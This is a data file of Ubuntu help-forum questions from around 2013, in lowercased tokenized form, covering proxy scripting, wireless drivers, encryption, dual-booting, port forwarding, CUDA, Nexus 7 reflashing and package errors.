274200	is it possible to use ubuntu-system-service to set a system-wide proxy setting ?	i 'm running ubuntu-studio 12.10 using gnome-3 , and i 'm trying to set up a bash script in /etc/network/if-up.d to auto-configure my proxy settings based on the ssid of the network i 'm connected to . i can not get gsettings to work automatically , using any of the following : gsettings set org.gnome.system.proxy mode `` manual '' sudo -u blaine gsettings set org.gnome.system.proxy mode `` manual '' su blaine -c 'gsettings set org.gnome.system.proxy mode `` manual '' ' furthermore , i 'd like the script to change the environment variables http_proxy , https_proxy and so forth so that things like wine would recognise them without having to log out and back in , and five days of googling tells me this is impossible . except - i know it can be done . the `` apply system-wide '' button in unity does all this without having to re-log . some further digging revealed this article that suggest the button accesses com.ubuntu.systemservice.setproxy , which is presumably part of the ubuntu-system-service package . is it possible to use ubuntu-system-service to set a system-wide proxy via bash , the terminal , or similar ?
274202	broadcom b4313 not works	there is wireless in network-manager , but not connect with wifi-router . wifi networks do n't find to . uname -a : linux alex-lenovo-b570e 3.5.0-26-generic # 42-ubuntu smp fri mar 8 23:18:20 utc 2013 x86_64 x86_64 x86_64 gnu/linux iwconfig : eth0 no wireless extensions . eth1 ieee 802.11abg essid : off/any mode : managed access point : not-associated retry long limit:7 rts thr : off fragment thr : off power management : off lo no wireless extensions . rfkill list : 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no lspci -vnn -d 14e4 : 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) subsystem : broadcom corporation device [ 14e4:051b ] flags : bus master , fast devsel , latency 0 , irq 17 memory at d0500000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : wl kernel modules : wl , bcma find /lib/modules/uname -r-name '*.ko ' | grep wireless : /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/airo.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/mwl8k.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/libertas/libertas.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/libertas/usb8xxx.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/libertas/libertas_spi.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/libertas/libertas_sdio.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/libertas/libertas_cs.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/iwlwifi/iwlwifi.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/p54/p54usb.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/p54/p54common.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/p54/p54spi.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/p54/p54pci.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/brcm80211/brcmsmac/brcmsmac.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/brcm80211/brcmutil/brcmutil.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/brcm80211/brcmfmac/brcmfmac.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/ipw2x00/libipw.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/ipw2x00/ipw2100.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/ipw2x00/ipw2200.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/mwifiex/mwifiex_pcie.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/mwifiex/mwifiex_usb.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/mwifiex/mwifiex.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/mwifiex/mwifiex_sdio.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/hostap/hostap_cs.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/hostap/hostap_pci.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/hostap/hostap_plx.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/hostap/hostap.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/rtl818x/rtl8180/rtl8180.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/rtl818x/rtl8187/rtl8187.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/atmel.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/iwlegacy/iwl3945.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/iwlegacy/iwlegacy.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/iwlegacy/iwl4965.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/ti/wlcore/wlcore_sdio.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/ti/wlcore/wlcore.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/ti/wlcore/wlcore_spi.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/ti/wl12xx/wl12xx.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/ti/wl1251/wl1251_sdio.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/ti/wl1251/wl1251_spi.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/ti/wl1251/wl1251.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/rtlwifi/rtl8192cu/rtl8192cu.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/rtlwifi/rtl8192se/rtl8192se.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/rtlwifi/rtl8192de/rtl8192de.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/rtlwifi/rtl8192c/rtl8192c-common.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/rtlwifi/rtlwifi.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/rtlwifi/rtl8192ce/rtl8192ce.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/zd1201.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/wl3501_cs.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/mac80211_hwsim.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/rndis_wlan.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/atmel_cs.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/rt2x00/rt73usb.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/rt2x00/rt2x00lib.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/rt2x00/rt2x00pci.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/rt2x00/rt61pci.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/rt2x00/rt2x00usb.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/rt2x00/rt2800lib.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/rt2x00/rt2500usb.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/rt2x00/rt2400pci.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/rt2x00/rt2500pci.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/rt2x00/rt2800pci.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/rt2x00/rt2800usb.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/zd1211rw/zd1211rw.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/iwmc3200wifi/iwmc3200wifi.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/adm8211.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/ray_cs.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/airo_cs.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/b43legacy/b43legacy.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/orinoco/orinoco.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/orinoco/orinoco_nortel.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/orinoco/orinoco_usb.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/orinoco/orinoco_plx.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/orinoco/orinoco_tmd.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/orinoco/spectrum_cs.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/orinoco/orinoco_cs.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/b43/b43.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/ath/ath5k/ath5k.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/ath/ath6kl/ath6kl_core.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/ath/ath6kl/ath6kl_sdio.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/ath/ath6kl/ath6kl_usb.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/ath/carl9170/carl9170.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/ath/ath.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k_hw.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k_common.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k_htc.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/libertas_tf/libertas_tf_usb.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/libertas_tf/libertas_tf.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/atmel_pci.ko /lib/modules/3.5.0-26-generic/kernel/drivers/net/wireless/at76c50x-usb.ko /lib/modules/3.5.0-26-generic/kernel/drivers/tty/ipwireless/ipwireless.ko /lib/modules/3.5.0-26-generic/kernel/net/wireless/cfg80211.ko /lib/modules/3.5.0-26-generic/kernel/net/wireless/lib80211_crypt_tkip.ko /lib/modules/3.5.0-26-generic/kernel/net/wireless/lib80211_crypt_ccmp.ko /lib/modules/3.5.0-26-generic/kernel/net/wireless/lib80211.ko /lib/modules/3.5.0-26-generic/kernel/net/wireless/lib80211_crypt_wep.ko sudo iwlist eth1 scan : eth1 interface does n't support scanning : invalid argument dmesg | grep -e wl -e eth1 : [ 26.975698 ] wl : module license 'mixed/proprietary ' taints kernel . [ 27.136694 ] info @ wl_cfg80211_attach : registered cfg80211 phy [ 27.242344 ] eth1 : broadcom bcm4727 802.11 hybrid wireless controller 6.20.155.1 ( r326264 ) [ 31.754180 ] error @ wl_cfg80211_scan : wlc_scan error ( -22 ) [ 35.100996 ] error @ wl_cfg80211_scan : wlc_scan error ( -22 ) [ 58.103251 ] error @ wl_cfg80211_scan : wlc_scan error ( -22 ) [ 91.107992 ] error @ wl_cfg80211_scan : wlc_scan error ( -22 ) [ 130.258875 ] error @ wl_cfg80211_scan : wlc_scan error ( -22 ) [ 133.118953 ] error @ wl_cfg80211_scan : wlc_scan error ( -22 ) [ 156.123379 ] error @ wl_cfg80211_scan : wlc_scan error ( -22 ) [ 169.119180 ] error @ wl_dev_intvar_get : error ( -1 ) [ 169.119191 ] error @ wl_cfg80211_get_tx_power : error ( -1 ) [ 189.126384 ] error @ wl_cfg80211_scan : wlc_scan error ( -22 ) [ 411.166980 ] error @ wl_cfg80211_scan : wlc_scan error ( -22 ) [ 474.181995 ] error @ wl_cfg80211_scan : wlc_scan error ( -22 ) [ 537.180742 ] error @ wl_cfg80211_scan : wlc_scan error ( -22 ) [ 1041.020134 ] error @ wl_cfg80211_scan : wlc_scan error ( -22 ) [ 1090.432811 ] error @ wl_dev_intvar_get : error ( -1 ) [ 1090.432822 ] error @ wl_cfg80211_get_tx_power : error ( -1 ) [ 1104.003465 ] error @ wl_cfg80211_scan : wlc_scan error ( -22 ) [ 1166.980306 ] error @ wl_cfg80211_scan : wlc_scan error ( -22 )
274203	is encfs safe with ubuntu one	i am using ubuntu one as my cloud storage and using encfs to encrypt some sensitive data but i am not sure if this is safe ? can someone , if s/he has my u1 password , download my encrypted data and decrypt them ? thx
274206	how do i manage regular fscks for large amounts of data ?	i 'm guessing there 's a recommended size that doing fsck would be counter productive , say if the size is 100tb or greater doing it with the default setting of 30 or 20 mounts or 180 days is a bit excessive , production environment ca n't be down that long provided that the backup of said data are there . so is there a limit or paper on `` yeah , after that ( n ) size it 's suggested that the default settings change to something else ( 80-100 mounts ) 300 days etc '' .
274209	a newbie moving from windows 7 to ubuntu for the first time . what if i decide to uninstall ubuntu ?	i 'm currently downloading the windows installer . i 'm using windows 7 but want to multiboot ubuntu . i want to ask a simple thing . if i ever decide to uninstall ubuntu , does my windows 7 system may go corrupt ? i worry about it because right now windows 7 has full access on my hdd . does ubuntu work like an application under windows 7 , like creating a folder for itself ? or does it automatically edit my partitions and give itself 100gb , lower windows 7 's partition to 900gb ? ( like how we usually format our computers ) windows installer sounds super easy comparing to loading ubuntu .iso file and editing partition settings ourself and it got me wondering . thank you already and i hope ubuntu will be a great experience for me !
274210	forward [ open ] ports 7777 ; 2106	hi i am new to ubuntu ( 12.10 ) x64 trying to forward ports for gameserver on my pc ( lineage ii ) ports are opened in ufw ports are opened in my router even if i disable ufw others still cant login to gameserver tried most [ terminal ] commands to forward ports still wont open i have the server opened which should make ports liste and they should appear to be open in sites like canyouseeme.ogr also tried some commands to open them in 'iptables ' im so confused help
274215	setting up cuda	i have a lenovo y580 , and i am following the instructions from this blog post to set up my laptop for gpu programming . at the end of the blog post , he says you will have to install gcc 4.4 $ sudo apt-get install -y gcc-4.4 g++-4.4 $ sudo ln -s /usr/bin/gcc-4.4 /usr/local/cuda/bin/gcc and tell nvcc to use it with the directive : -- compiler-bindir=/usr/local/cuda/bin what does it mean to `` tell nvcc to use it with the directive : -- compiler-bindir=/usr/local/cuda/bin '' ?
274217	is it possible to have the remote host name appear in x11 windows ?	i found that running applications over x11 from remote virtual machines give a lot better performance than vnc or spice . however , it can get confusing when you have a bunch of windows open on your desktop and some are locally running and others are remotely running . in the old days , window managers would put the remote host name in the title bar of the window . any way to get that to happen in unity on ubuntu 12.04 / 12.10 ?
274222	reinstalling android on an 8gb nexus7 ( grouper ) coming from ubuntu touch	solved : see below for the answer i 've had ubuntu touch on my 8gb nexus 7 for a while now ( from the day it was released ) . today i wanted to go back to android . however flashing the nakasi-jdq39 image fails while erasing/flash the userdata section with error : file_write : write : no space left on device - also when i execute sudo fastboot format userdata . this leads me to a set of questions/ideas of why this could be : does the ubuntu touch installer ( esp . the very first version ) change the partition table of device somehow ? if so , how do i revert those changes ? was ubuntu touch ever intended to be installed on an 8gb nexus 7 ? has anyone else had similar/the same problems and how did they solve it ? any help or idea is appreciated . in an attempt to verify the `` ubuntu touch changes the partition table '' assumption i 've listed said table , and it seems like there is no change . $ sudo fastboot getvar all ( bootloader ) version-bootloader : 4.18 ( bootloader ) version-baseband : n/a ( bootloader ) version-hardware : er3 ( bootloader ) version-cdma : n/a ( bootloader ) variant : grouper ( bootloader ) serialno : 015d24a42a0ff610 ( bootloader ) product : grouper ( bootloader ) secure : no ( bootloader ) unlocked : yes ( bootloader ) uart-on : no ( bootloader ) partition-size : bootloader : 0x0000000000600000 ( bootloader ) partition-type : bootloader : emmc ( bootloader ) partition-size : recovery : 0x0000000000c00000 ( bootloader ) partition-type : recovery : emmc ( bootloader ) partition-size : boot : 0x0000000000800000 ( bootloader ) partition-type : boot : emmc ( bootloader ) partition-size : system : 0x0000000028a00000 ( bootloader ) partition-type : system : ext4 ( bootloader ) partition-size : cache : 0x000000001bb00000 ( bootloader ) partition-type : cache : ext4 ( bootloader ) partition-size : userdata : 0x0000000180b00000 ( bootloader ) partition-type : userdata : ext4 all : finished . total time : 0.160s $ echo $ [ $ ( printf `` % d '' 0x0000000180b00000 ) /1024/1024 ] 6155 although i still do n't know what caused this error , at least i have my device back . manually flashing system and userdata did the trick : $ sudo fastboot flash system system.img erasing 'system ' ... okay [ 1.447s ] sending 'system ' ( 471804 kb ) ... okay [ 55.746s ] writing 'system ' ... okay [ 34.717s ] finished . total time : 91.910s $ sudo fastboot flash userdata userdata.img erasing 'userdata ' ... okay [ 7.360s ] sending 'userdata ' ( 104289 kb ) ... okay [ 12.352s ] writing 'userdata ' ... okay [ 14.267s ] finished . total time : 33.980s $ sudo fastboot reboot rebooting ... finished . total time : 0.020s
274224	md arrays mounted incorrectly ( no rwd )	i 've got various raid 1 & 0 ( mdadm ) arrays mounted in /media/ via fstab but i 'm coming into trouble creating/deleting files from some of these volumes from the gui and programs , it 's as if they are mount read-only . my default fstab mount options for non home/root arrays is : uuid= '' xxx '' /media/xxx ext4 noatime , data=writeback , errors=remount-ro 0 1 a typical bootup mount reads as : md6 : detected capacity change from 0 to 25999966208 [ 4.112397 ] md6 : unknown partition table [ 4.154724 ] md : bind < sdc9 > [ 4.173584 ] md/raid1 : md18 : active with 2 out of 2 mirrors [ 4.173651 ] md18 : detected capacity change from 0 to 80967303168 [ 4.215755 ] md18 : unknown partition table [ 4.303747 ] md : bind < sdc8 > [ 4.335634 ] md/raid0 : md15 : md_size is 156249856 sectors . [ 4.335685 ] md : raid0 configuration for md15 - 1 zone [ 4.335735 ] md : zone0= [ sdc8/sdd8 ] [ 4.335876 ] zone-offset= 0kb , device-offset= 0kb , size= 78124928kb there 's no mention of errors or readonly here in dmesg . i 've tried removing the ro option but this makes not difference . what can i try next ? i have added write permissions to the group as a workaround ( sudo chmod go+rw /media/xxx ) but i 'm not sure why this is n't available by default as it would be normally , and perhaps adding these permissions is a security risk .
274226	errors while processing jackey-common and jockey-gtk	i did a sudo apt-get update and sudo apt-get upgrade and keep getting this error : reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : libunity-core-5.0-5 linux-headers-linaro-lt-origen linux-image-linaro-lt-origen linux-tools linux-tools-linaro-lt-origen unity unity-common unity-services 0 upgraded , 0 newly installed , 0 to remove and 8 not upgraded . 2 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lc_ctype = `` en_us.utf-8 '' , lang = `` c.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory setting up jockey-common ( 0.9.7-0ubuntu7.7 ) ... sorry : typeerror : ( 'compile ( ) expected string without null bytes ' , ) sorry : typeerror : ( 'compile ( ) expected string without null bytes ' , ) sorry : typeerror : ( 'compile ( ) expected string without null bytes ' , ) sorry : typeerror : ( 'compile ( ) expected string without null bytes ' , ) sorry : typeerror : ( 'compile ( ) expected string without null bytes ' , ) sorry : typeerror : ( 'compile ( ) expected string without null bytes ' , ) dpkg : error processing jockey-common ( -- configure ) : subprocess installed post-installation script returned error exit status 101 dpkg : dependency problems prevent configuration of jockey-gtk : jockey-gtk depends on jockey-common ( = 0.9.7-0ubuntu7.7 ) ; however : package jockey-common is not configured yet . dpkg : error processing jockey-gtk ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : jockey-common jockey-gtk e : sub-process /usr/bin/dpkg returned an error code ( 1 ) first how can i fix that perl warning that always comes up ? and second , how can i get jockey-common and jockey-gtk to install correctly ?
274237	reverse firewall or application firewalls ?	firewalls are typically employed to prevent bad `` packets '' coming in from the outside world . but these days we are mostly behind routers and a lot of that danger is mitigated by the router . the danger we face is mostly from within . the proverbial trojan horse . in windows world there are a lot of application firewalls and osx has a neat utility called `` little snitch '' with does this job of ensuring applications behave by not requesting data outside of their scope . even my iphone , jail broken , has an app that prevents applications from accessing web site outside of their scope . its surprising the amount of data they `` push '' to web sites like scorecard.com and a variety of apple servers . i disable these and the applications still work so i know its not necessary . in linux world there seems to be little in this vein . you can kludge it with iptables and some other scripts in perl to get the result in a very clumsy way . take this post which is frequently referenced when a question like this is asked . how to control internet access for each program ? it does n't answer the question . they talk about firewalls that totally cut of a port which is not what most people want . all most people want is that application x which should be a local app does n't go out and chat to the web when it has no need to chat to the web . or a program that access yahoo weather goes to five other sites not related to its job of accessing the weather . or in my one of my banking apps on iphone goes outside of the bank to a webtrends web site . sure its not related to ubuntu but is an example of apps behaving badly . the other app referred to in this post is leopard flower which has n't been updated in a year and i 'd hate to keep that running with the up coming release of ubuntu . all other posts related to this area keep making recommendations for apps that totally cut off access for an application but do n't provide that simple `` little snitch '' idea of app x wants to access web y , allow or deny access . no complicated iptable rules , no total port cut offs . have i looked hard enough or is there simply no `` application firewall '' for ubuntu ?
274240	how do i run a python script with wine ?	i 'm using calibre to manage my ebooks and i 'm trying to install a plugin that will allow me to manage library books that i get through adobe digital editions via wine . i 've got everything installed , but i need to run an additional script to tie it all together . i get to one step in the instructions that says `` you 'll need to run the adobekey.pyw script using the python installation in your wine system . '' so how do i run a script using the python installation in wine ? this is my first time using wine , so please make your answers as basic as possible .
274241	what is the recommended widget toolkit for ubuntu desktop ?	as i understand it , qt - c++ and qml - or html5 are recommended for writing ubuntu for phones applications . also , correct me if i 'm wrong , but python is the preferred language for ubuntu desktop . does this mean python 3 ? however , i ca n't find any documentation stating what widget toolkit , gtk+ or qt , is preferred . additionally , what version/generation of these is recommended ? i do n't know anything about recent qt versions , but i know that gtk+2 and gtk+3 are distinct and different to code for . am i to assume that if the preferred toolkit is gtk+ , we 're talking about gtk+3 ? this page states that pygtk is recommended . however , i ca n't tell what exactly this entails - does it mean that python is recommended , gtk+ is recommended , or both , using pygtk for gtk+ bindings ?
274242	how can i repair the grub using windows 8 ?	i am running on a hp envy dv6 laptop with an amd a8 . it has windows 8 . i installed ubuntu from a liveusb that i created , but it wont give me the option to boot into it . i disabled secureboot and fastboot , but that did n't help . another thing i noticed is after i installed a local disk f : was created , that windows wants to format and has 99gb of storage space . i also ran boot repair inside the ubuntu trial and got this : boot successfully repaired . please write on a paper the following url : http : //paste.ubuntu.com/5653811/ in case you still experience boot problem , indicate this url to : boot.repair < at > gmail.com or to your favorite support forum . you can now reboot your computer . please do not forget to make your bios boot on sda2/efi/grub/shimx64.efi file ! a broken wubi has been detected . please fix it this way : https : //wiki.ubuntu.com/wubiguide # cannot_boot_into_ubuntu thank you in advance
274245	adjust timeout settings on ubuntu backup ( dejadup )	i use deja-dup front-end ( default backup application in ubuntu since 12.04 or so ? ) to execute a remote backup . recently , the backup seems to run fine , transferring files successfully to the remote backup server , but when running the `` verifying backup '' stage , it always ends now with the error `` timeout was reached '' . is there some way to adjust the time out settings or otherwise work around this error ? ( i do n't see anything in the front end , but perhaps adjusting duplicity settings from the command line some how ? ) . thanks !
274246	sensor bar ( wiimote like ) does n't work	i recently bought a sensor bar to play wii games on my ubuntu 12.04 , but it does n't work . it shows as `` d_r_m magic sport bar '' on applications , and the dmesg output is : [ 118124.192142 ] input : d_r_m magic sport bar as /devices/pci0000:00/0000:00:12.0/usb4/4-2/4-2:1.0/input/input51 [ 118124.192468 ] generic-usb 0003 : ffff:0102.002f : input , hidraw0 : usb hid v1.01 keyboard [ d_r_m magic sport bar ] on usb-0000:00:12.0-2/input0 [ 118124.197034 ] input : d_r_m magic sport bar as /devices/pci0000:00/0000:00:12.0/usb4/4-2/4-2:1.1/input/input52 [ 118124.197296 ] generic-usb 0003 : ffff:0102.0030 : input , hidraw1 : usb hid v1.01 mouse [ d_r_m magic sport bar ] on usb-0000:00:12.0-2/input1 [ 118124.203712 ] input : d_r_m magic sport bar as /devices/pci0000:00/0000:00:12.0/usb4/4-2/4-2:1.2/input/input53 [ 118124.203969 ] generic-usb 0003 : ffff:0102.0031 : input , hidraw2 : usb hid v1.01 joystick [ d_r_m magic sport bar ] on usb-0000:00:12.0-2/input2 [ 118124.210008 ] generic-usb 0003 : ffff:0102.0032 : hiddev0 , hidraw3 : usb hid v1.11 device [ d_r_m magic sport bar ] on usb-0000:00:12.0-2/input3 maybe i need to install some driver to get it working properly , but i ca n't find it . i tried to install the drivers on windows and it worked well . sorry my bad english .
274249	best way to record vnc session ( vlc screencast ) ?	i know i can record my desktop while running remmina , but is there an easy way to record a vnc session without having to watch the actual session live on your screen ? sometimes i need to leave the vnc session for a while to do some other task and i would like to continue to record during that time .
274257	buying a new pc without uefi	is it possible to buy a new pc without the secure boot or uefi ? at some point i would like to purchase a new pc and be able to run ubuntu and possibly a windows os , either dual boot or via a vm . ubuntu would be the default os . thank you !
274258	tun/tap installation	i have got a virtual private server with ubuntu 12.04.2 lts ( gnu/linux 2.6.32-5-openvz-amd64 x86_64 ) . i want to install openvpn but this requires a working tun device . i get the following error : note : can not open tun/tap dev /dev/net/tun : operation not permitted ( errno=1 ) # modprobe tun warning : deprecated config file /etc/modprobe.conf , all config files belong into /etc/modprobe.d/ . fatal : module tun not found . what do i have to do to get this tun running ?
274262	how i can build an image to run ubuntu server 12.04 as a stateless linux on a diskless baremetal pc	how i can build an image to run ubuntu server 12.04 as a stateless linux on a diskless baremetal pc , pxe booted and partially preconfigured and the rest configured on a boot using attribututes passed through the pxe.cfg . i also would like to insert the script into the image , maybe into /etc/init.d/sxx so it 'll be executed on boot before the services/network started .
274263	i need a bitcoin miner , and how to install it ?	i have attempted to follow the tutorial , and got this : deathd @ ubuntu : ~ $ cd phoenix2-phoenix-2c83ee6 deathd @ ubuntu : ~/phoenix2-phoenix-2c83ee6 $ ./setup.py usage : setup.py [ global_opts ] cmd1 [ cmd1_opts ] [ cmd2 [ cmd2_opts ] ... ] or : setup.py -- help [ cmd1 cmd2 ... ] or : setup.py -- help-commands or : setup.py cmd -- help error : no commands supplied i followed the part at the bottom of the page , and received this : do you want to continue [ y/n ] ? y dpkg : error processing alsa-base ( -- configure ) : package alsa-base is not ready for configuration can not configure ( current status `half-installed ' ) errors were encountered while processing : alsa-base e : sub-process /usr/bin/dpkg returned an error code ( 1 )
274265	ubuntu 12.10 indicator-sound shows as mute ( three hyphens	i kind of have a problem . i installed ubuntu 12.10 and my sound seems to be fine . i can play videos etc . the trouble i have is the indicator-sound applet shows as a speaker with three hyphens as if it is in mute . the slider to turn the volume up/down looks like how you would expect it to be if it was muted . but i have sound . i want to fix this so i can use that slider for what it is meant for . any help would be greatly appreciated . i do n't know the exact details of my sounds card . all i could tell you at this moment is it is onboard sound on a gateway dx4860 ( tower ) .
274275	why ubuntu software center does n't have the latest version of softwares ?	say i want to install codeblocks ( c/c++ ide ) using ubuntu software centre . but , if i do that i will install version 10 , when i can have version 12 if i download package from codeblocks website . the same happens with eclipse . ubuntu software centre has version 3.x and i can have 4.x from eclipse website . question is why ubuntu software centre does n't have the latest version of a software ? is this the lack of interest of developers , not to update their latest release on ubuntu software centre ? or something else ?
274276	system requirements for ubuntu touch ?	the system requirements for ubuntu touch are not completely obvious to me . ubuntu for android drops in cleanly alongside the rest of android , so it is easy to integrate into current production roadmaps . the hardware requirements are straightforward and , with a broad range of arm and x86 hardware supported , it can realistically be added to phones already in development . of course , your phone needs the docking capability and hardware support for hdmi and usb . but thatâs standard for high-end models in the current generation of devices in development . well the `` hdmi '' requirement probably only applies if you want to use a monitor . i really want to install ubuntu touch on my phone , is there a list of all supported hardware pieces available ? i am curious if it could work with http : //www.gsmarena.com/sony_ericsson_xperia_mini-3947.php
274278	ca n't update or install software	i 'm am brand new to ubuntu . i can not update software or download software such as wine . i get a message that says failed to download repository information . check internet connection . but i have an internet connection . these are the details of the message : w : gpg error : ( ) packages.medibuntu.org quantal release : the following signatures could n't be verified because the public key is not available : no_pubkey 2ebc26b60c5a2783 , w : failed to fetch ( ) ppa.launchpad.net/banshee-team/ppa/ubuntu/dists/quantal/main/source/sources 404 not found , w : failed to fetch ( ) ppa.launchpad.net/banshee-team/ppa/ubuntu/dists/quantal/main/binary-amd64/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . i had to put ( ) in place of http to avoid hyperlinks ( also , how do i avoid this problem in the future ) . i found a forum that mentioned going to software sources and removing `` extras '' , but that did not work . i am using ubuntu 12.10 with a cinnamon environment . i can provide further information if needed .
274282	can connect ubuntu with windows workgroup	i have a two systems in my home , one is windows 7 and other is ubuntu precise pangolin . now i want to connect my two systems in one workgroup for sharing purpose . is it possible to achieve this.. ?
274283	nexio usb ir touchscreen issues	i have usb nexio touchscreen attached to my dell inspirion m2300 . ubuntu 12.10 desktop . xinput and lsusb correctly lists out the touchscreen as `` inexio inexio usb '' but there is no response on using the touchscreen . running evtest and xinput calibrate does not return anything as the touchscreen does n't seem to be responding to touch .
274286	usb 2.0 does n't recognize dual boot on a pre-installed uefi supported windows 8 system	i 've installed ubuntu 12.04 in external hard drive with usb 3.0 hardware on a pre-installed uefi supported windows 8 system . when installation is done , i tried to boot ubuntu on usb 2.0 but that 's does n't working and when i tried to put the usb flash disk is not recognized too , so i always use usb 3.0 to boot ubuntu . is there a way to recognize the usb 2.0 ? my laptop is the sony vaio svt13126cvs
